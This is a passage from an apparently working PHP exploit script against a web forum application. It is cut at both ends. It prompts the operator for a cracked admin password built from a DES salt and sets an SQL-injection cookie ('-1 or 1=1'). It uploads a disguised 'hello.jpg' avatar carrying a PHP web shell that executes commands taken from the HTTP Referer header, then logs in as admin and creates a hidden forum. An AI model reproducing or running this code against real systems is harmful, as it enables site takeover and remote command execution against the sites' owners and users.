} } } $salt = !empty($vars[2][4]) ? $vars[2][4] : 'atk'; # Always the same salt ... print "\nsploit> Salt -> {$salt} (Standard DES hash)"; print "\nsploit> Enter the decrypted password to continue: "; $password = trim(fgets(STDIN)); $xpl->addcookie("fid", "-1 or 1=1"); $xpl->cookiejar(1); print "status> Uploading a malicious picture"; $formdata = array(frmdt_url => $url . "?owner={$owner}&action=profile", "email" => "{$name}@hotmail.coum", "url" => "http://", "upload" => array(frmdt_type => "image/jpg", frmdt_filename => "hello.jpg", frmdt_content => "<?php print 337666733;@extract(\$_SERVER);@system(\$HTTP_REFERER);print 337666733;exit(0); ?>"), "avatar" => "./avatar/welcome.jpg"); $xpl->formdata($formdata); print "\nstatus> Trying to get logged in"; $xpl->post($url . 'myadmin.php?action=login', 'login='******'&passwd=' . $password); if (preg_match("#ATK_ADMIN#i", $xpl->showcookie())) { print "\nsploit> Done"; } else { die("\nsploit> Exploit failed"); } print "\nstatus> Creating a hidden forum"; $xpl->get($url . 'myadmin.php?choix=2'); if (!preg_match("#<option value='(\\S+)'#", $xpl->getcontent(), $styles)) { $styles[1] = "xml_BlueLight"; } $xpl->post($url . 'myadmin.php?action=create', "title={$name}&filename={$name}&passwd=&style=" . $styles[1] . "&structure=1&subject="); $xpl->get($url . 'myadmin.php?choix=1'); if (!preg_match_all("#action=hide_forum&id=([0-9]+)#", $xpl->getcontent(), $fid)) { die("\nsploit> Can't retrieve the forum id"); } $forumid = $fid[1][count($fid[1]) - 1];